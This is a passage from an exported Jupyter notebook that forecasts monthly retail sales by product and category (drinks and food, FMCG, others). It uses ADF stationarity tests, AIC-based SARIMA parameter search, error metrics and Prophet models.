'Sales':y_others.values})\n\n\n# # Data Exploration\n\n# In[142]:\n\n\nstore_drinks_fmcg = dfood1.merge(fmcg1, how='inner', on='Order Date')\nstore_drinks_fmcg.rename(columns={'Sales_x':'drinks_&_food_sales','Sales_y':'fmcg_sales'},inplace=True)\n\n\n# In[143]:\n\n\nstore_drinks_others = dfood1.merge(others1, how='inner', on='Order Date')\nstore_drinks_others.rename(columns={'Sales_x':'drinks_&_food_sales','Sales_y':'others_sales'},inplace=True)\n\n\n# 
In[144]:\n\n\nstore_others_fmcg = others1.merge(fmcg1, how='inner', on='Order Date')\nstore_others_fmcg.rename(columns={'Sales_x':'others','Sales_y':'fmcg_sales'},inplace=True)\n\n\n# In[145]:\n\n\nstore_drinks_fmcg_others = others1.merge(store_drinks_fmcg, how='inner', on='Order Date')\nstore_drinks_fmcg_others.rename(columns={'Sales':'others_sales','Sales_x':'Drinks_&_food_sales','Sales_y':'FMCG sales'},inplace=True)\n\n\n# ## Plotting\n\n# In[146]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_fmcg['Order Date'],store_drinks_fmcg['drinks_&_food_sales'],'b-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_fmcg['Order Date'],store_drinks_fmcg['fmcg_sales'],'r-',label='fmcg_sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of drinks and FMCG')\nplt.legend()\n\n\n# In[147]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_others['Order Date'],store_drinks_others['drinks_&_food_sales'],'b-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_others['Order Date'],store_drinks_others['others_sales'],'r-',label='others sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of drinks and other supplies')\nplt.legend()\n\n\n# In[148]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_others_fmcg['Order Date'],store_others_fmcg['fmcg_sales'],'b-',label='fmcg_sales',linewidth=5)\nplt.plot(store_others_fmcg['Order Date'],store_others_fmcg['others'],'r-',label='others',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of FMCG and Other supplies')\nplt.legend()\n\n\n# In[149]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['fmcg_sales'],'b-',label='furniture',linewidth=5)\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['drinks_&_food_sales'],'r-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['others_sales'],'g-',label='others_sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of Drinks & Food ,FMCG and Other supllies')\nplt.legend()\n\n\n# # -----------------------------------------------------------------------------\n\n# # -----------------------------------------------------------------------------\n\n# # MODEL CREATION\n\n# # SARIMA Model\n\n# NOTE: During earlier ETS decomposition, it was observed that both category-wise and product-wise data exhibit seasonality. 
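SARIMA extends ARIMA with a seasonal (P, D, Q, s) term, fitted here with s = 12 so that the yearly pattern in the monthly data is modelled directly. 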
Therefore, SARIMA was chosen over ARIMA to account for the seasonal component in the data.\n\n# ## Product Wise Modelling\n\n# ### Choosing Best Model\n\n# In[150]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n out = pd.Series(result[0:4], index=labels)\n\n for key, val in result[4].items():\n out[f'critical value ({key})'] = val\n\n print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n d = adf_test(sales_monthly[col])\n \n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n print(f'\\nARIMA for: {col}\\n')\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n print(results.summary().tables[1])\n\n results.plot_diagnostics(figsize=(15, 8))\n plt.show()\n\n\n# ### Prediction using selected model\n\n# In[151]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for 
param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n ax = y['2012':].plot(label='Observed')\n pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\n ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n\n plt.legend()\n plt.show()\n\n\n# ### Evaluation of Model Created\n\n# In[152]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n #print('Data is stationary')\n else:\n d = 1\n #print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\nSA_data = pd.DataFrame(columns=['Product Identifier','MSE_sarima', 'RMSE_sarima','MAE_sarima'])\n\nfor col in sales_monthly.columns:\n #print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n #print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n # ax = y['2012':].plot(label='Observed')\n # pred.predicted_mean.plot(ax=ax, label='One-step ahead 
Forecast', alpha=.7, figsize=(14, 7))\n # ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n #ax.set_xlabel('Date')\n #ax.set_ylabel(col)\n\n #plt.legend()\n #plt.show()\n \n #y_forecasted = pred.predicted_mean\n #y_truth = y['2013-07-01':]\n #y_truth= y_truth.stack()\n #mse = ((y_forecasted - y_truth) ** 2).mean()\n #print(\"The Mean Squared Error of our forecasts is {}\".format(round(mse, 2)))\n #print(\"The Root Mean Squared Error of our forecasts is {}\".format(round(np.sqrt(mse))))\n # Calculate MSE and RMSE\n y_forecasted = pred.predicted_mean\n y_truth = y['2013-07-01':]\n y_pred = y_truth.stack()\n mse = ((y_forecasted - y_pred) ** 2).mean()\n rmse = np.sqrt(mse)\n mae=mean_absolute_error(y_forecasted,y_pred)\n\n # Store MSE and RMSE values in the dataset\n SA_data = SA_data.append({'Product Identifier': col, 'MSE_sarima': mse, 'RMSE_sarima': rmse, 'MAE_sarima': mae}, ignore_index=True)\n\n\n# In[153]:\n\n\nSA_data\n\n\n# ### Forecasting \n\n# In[154]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n ax = y['2012':].plot(label='Observed')\n pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\n ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n\n plt.legend()\n plt.show()\n \n #y_forecasted = pred.predicted_mean\n #y_truth = y['2013-07-01':]\n #y_truth= 
y_truth.stack()\n #mse = ((y_forecasted - y_truth) ** 2).mean()\n #print(\"The Mean Squared Error of our forecasts is {}\".format(round(mse, 2)))\n #print(\"The Root Mean Squared Error of our forecasts is {}\".format(round(np.sqrt(mse))))\n \n \n pred_uc = results.get_forecast(steps=100)\n pred_cl = pred_uc.conf_int()\n ax = y.plot(label='observed', figsize=(14, 7))\n pred_uc.predicted_mean.plot(ax=ax, label='Forecast')\n ax.fill_between(pred_cl.index, pred_cl.iloc[:, 0], pred_cl.iloc[:, 1], color='k', alpha=.2)\n ax.set_ylim([-100, 100])\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n plt.legend()\n plt.show()\n\n\n# ## Category wise Modelling\n\n# ### Drinks and Food\n\n# In[155]:\n\n\ny_drinks_and_food.skew()\n\n\n# In[156]:\n\n\n#checking stationarity\n\n\n# In[157]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\n\ndef adf_test1(series,title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n print(f'Augmented Dickey-Fuller Test: {title}')\n result = adfuller(series.dropna(),autolag='AIC') # .dropna() handles differenced data\n \n labels = ['ADF test statistic','p-value','# lags used','# observations']\n out = pd.Series(result[0:4],index=labels)\n\n for key,val in result[4].items():\n out[f'critical value ({key})']=val\n \n print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n \n if result[1] <= 0.05:\n print(\"Strong evidence against the null hypothesis\")\n print(\"Reject the null hypothesis\")\n print(\"Data has no unit root and is stationary\")\n else:\n print(\"Weak evidence against the null hypothesis\")\n print(\"Fail to reject the null hypothesis\")\n print(\"Data has a unit root and is non-stationary\")\n\n\n# In[158]:\n\n\nadf_test1(y_drinks_and_food)\n\n\n# In[159]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [0] # Fixing d to zero\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_drinks_and_food,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[160]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_drinks_and_food,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[161]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_drinks_and_food[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('drinks and food Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[162]:\n\n\ny_forecasted_df=pred.predicted_mean\n\ny_truth_df = y_drinks_and_food[ '2013-07-01':]\n\nSA_errors_df = 
pd.DataFrame(index=y_truth_df.index)\nSA_errors_df['Modelname'] = 'SARIMA'\nSA_errors_df['Actual'] = y_truth_df\nSA_errors_df['Predicted'] = y_forecasted_df\nSA_errors_df['Error'] = y_forecasted_df - y_truth_df\nSA_errors_df.head()\n\nmse_sa_df = ((y_forecasted_df - y_truth_df) ** 2).mean()\n\n# Calculate the mean absolute error (MAE)\nmae_sa_df = mean_absolute_error(y_truth_df, y_forecasted_df)\n\n# Calculate the mean squared error (MSE)\nmse_sa_df = mean_squared_error(y_truth_df, y_forecasted_df)\n# Calculate the root mean squared error (RMSE)\nrmse_sa_df = np.sqrt(mse_sa_df)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_df))\nprint(\"The Root Mean Squared Error of our forecasts is {}\".format(rmse_sa_df))\n\n\n# In[163]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_drinks_and_food.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([300, 600])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# ## Fast Moving Consumer Goods\n\n# In[164]:\n\n\ny_fast_moving_consumer_goods.skew()\n\n\n# In[165]:\n\n\n#checking stationarity\n\n\n# In[166]:\n\n\nadf_test1(y_fast_moving_consumer_goods)\n\n\n# In[167]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [1] # Fixing d to One\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_fast_moving_consumer_goods,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[168]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_fast_moving_consumer_goods,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[169]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_fast_moving_consumer_goods[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('fast moving consumer goods Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[170]:\n\n\ny_forecasted_fmcg=pred.predicted_mean\n\ny_truth_fmcg = y_fast_moving_consumer_goods[ '2013-07-01':]\n\nSA_errors_fmcg = pd.DataFrame(index=y_truth_fmcg.index)\nSA_errors_fmcg['Modelname'] = 'SARIMA'\nSA_errors_fmcg['Actual'] = y_truth_fmcg\nSA_errors_fmcg['Predicted'] = y_forecasted_fmcg\nSA_errors_fmcg['Error'] = y_forecasted_fmcg - y_truth_fmcg\nSA_errors_fmcg.head()\n\nmse_sa_fmcg = ((y_forecasted_fmcg - y_truth_fmcg) ** 2).mean()\n\n# Calculate the mean absolute error 
(MAE)\nmae_sa_fmcg = mean_absolute_error(y_truth_fmcg, y_forecasted_fmcg)\n\n# Calculate the mean squared error (MSE)\nmse_sa_fmcg = mean_squared_error(y_truth_fmcg, y_forecasted_fmcg)\n# Calculate the root mean squared error (RMSE)\nrmse_sa_fmcg = np.sqrt(mse_sa_fmcg)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_fmcg))\nprint(\"The Root Mean Squared Error of our forecasts is {}\".format(rmse_sa_fmcg))\n\n\n# In[171]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_fast_moving_consumer_goods.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([-100, 300])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# ## Others\n\n# In[172]:\n\n\ny_others.skew()\n\n\n# In[173]:\n\n\n#Checking stationarity\nadf_test1(y_others)\n\n\n# In[174]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [1] # Fixing d to One\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_others,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[175]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_others,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[176]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_others[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('others Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[177]:\n\n\ny_forecasted_others=pred.predicted_mean\n\ny_truth_others = y_others[ '2013-07-01':]\n\nSA_errors_others = pd.DataFrame(index=y_truth_others.index)\nSA_errors_others['Modelname'] = 'SARIMA'\nSA_errors_others['Actual'] = y_truth_others\nSA_errors_others['Predicted'] = y_forecasted_others\nSA_errors_others['Error'] = y_forecasted_others - y_truth_others\nSA_errors_others.head()\n\nmse_sa_others = ((y_forecasted_others - y_truth_others) ** 2).mean()\n\n# Calculate the mean absolute error (MAE)\nmae_sa_others = mean_absolute_error(y_truth_others, y_forecasted_others)\n\n# Calculate the mean squared error (MSE)\nmse_sa_others = mean_squared_error(y_truth_others, y_forecasted_others)\n# Calculate the root mean squared error (RMSE)\nrmse_sa_others = np.sqrt(mse_sa_others)\n\nprint(\"The Mean Squared Error of our forecasts is {}\".format(mse_sa_others))\nprint(\"The Root Mean Squared Error of our forecasts is 
{}\".format(rmse_sa_others))\n\n\n# In[178]:\n\n\npred_uc = results.get_forecast(steps=100)\npred_ci = pred_uc.conf_int()\nax = y_others.plot(label='observed', figsize=(14, 7))\npred_uc.predicted_mean.plot(ax=ax, label='Forecast')\nax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\nax.set_ylim([-50, 50])\nax.set_xlabel('Date')\nax.set_ylabel(' Sales')\nplt.legend()\nplt.show()\n\n\n# # ---------------------------------------------------------------------------------------\n\n# # Time series modelling with prophet\n\n# In[179]:\n\n\nget_ipython().system('pip install prophet')\n\n\n# In[180]:\n\n\nimport pandas as pd\nfrom prophet.plot import plot_plotly, plot_components_plotly\nfrom prophet import Prophet\n\n\n# ## Product wise-Prophet\n\n# In[181]:\n\n\ntrain_pro = sales_monthly.iloc[:]\n#add 20 if need to do evaluation\n\n\n# In[182]:\n\n\nfor col in sales_monthly:\n print(f'\\nPROPHET method for {col}\\n')\n\n y_df = train_pro.loc[:, [col]]\n y_df['ds'] = y_df.index\n y_df.columns = ['y', 'ds']\n\n m_y = Prophet()\n m_y.fit(y_df)\n\n future_y = m_y.make_future_dataframe(periods=12, freq='MS')\n\n forecast_y = m_y.predict(future_y)\n\n forecast_y[['ds', 'yhat_lower', 'yhat_upper', 'yhat']]\n\n plt.figure()\n m_y.plot(forecast_y)\n plt.title(f'Sales of {col}')\n plt.xlabel('Years')\n plt.ylabel('Sales')\n\n plt.figure()\n plot_plotly(m_y, forecast_y)\n\n plt.figure(figsize=(12, 5))\n forecast_y.plot(x='ds', y='yhat')\n plt.show()\n\n plt.figure()\n m_y.plot_components(forecast_y)\n\n plt.figure()\n plot_components_plotly(m_y, forecast_y)\n\n\n# In[183]:\n\n\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nprophet_data = pd.DataFrame(columns=['Product Identifier', 'MSE_p', 'RMSE_p','MAE_p'])\nfor col in sales_monthly:\n print(f'\\nPROPHET method for {col}\\n')\n\n y_df = train_pro.loc[:, [col]]\n y_df['ds'] = y_df.index\n y_df.columns = ['y', 'ds']\n\n m_y = Prophet()\n m_y.fit(y_df)\n\n future_y = m_y.make_future_dataframe(periods=12, freq='MS')\n\n forecast_y = m_y.predict(future_y)\n\n forecast_y[['ds', 'yhat_lower', 'yhat_upper', 'yhat']]\n\n # Calculate MSE and RMSE\n actual_values = y_df['y'].values\n predicted_values = forecast_y.loc[:len(actual_values)-1, 'yhat'].values\n mse = mean_squared_error(actual_values, predicted_values)\n rmse = np.sqrt(mse)\n mae= mean_absolute_error(actual_values,predicted_values)\n \n prophet_data = prophet_data.append({'Product Identifier': col, 'MSE_p': mse, 'RMSE_p': rmse,'MAE_p': mae}, ignore_index=True)\n\n # Rest of the code...\n \n prophet_data.drop_duplicates(subset='Product Identifier', inplace=True)\n #prophet_data=prophet_data[1:]\n\n\n# In[184]:\n\n\n#prophet_data.drop(0, inplace=True)\nprophet_data\n\n\n# # -----------------------------------------------------------------------------------------------\n\n# # Category Wise Modelling\n\n# ## Drinks and Food\n\n# In[185]:\n\n\ny_drinks_and_food_df = y_drinks_and_food.to_frame()\ny_drinks_and_food_df['ds'] = y_drinks_and_food_df.index\ny_drinks_and_food_df.columns = ['y','ds']\ny_drinks_and_food_df\n\n\n# In[186]:\n\n\ny_drinks_and_food_df.info()\n\n\n# In[187]:\n\n\nm_drinks_and_food = Prophet()\nm_drinks_and_food.fit(y_drinks_and_food_df)\n\n\n# In[188]:\n\n\nfuture_drinks_and_food = m_drinks_and_food.make_future_dataframe(periods=24,freq='MS')\nfuture_drinks_and_food\n\n\n# In[189]:\n\n\nforecast_drinks_and_food = m_drinks_and_food.predict(future_drinks_and_food)\nforecast_drinks_and_food\n\n\n# 
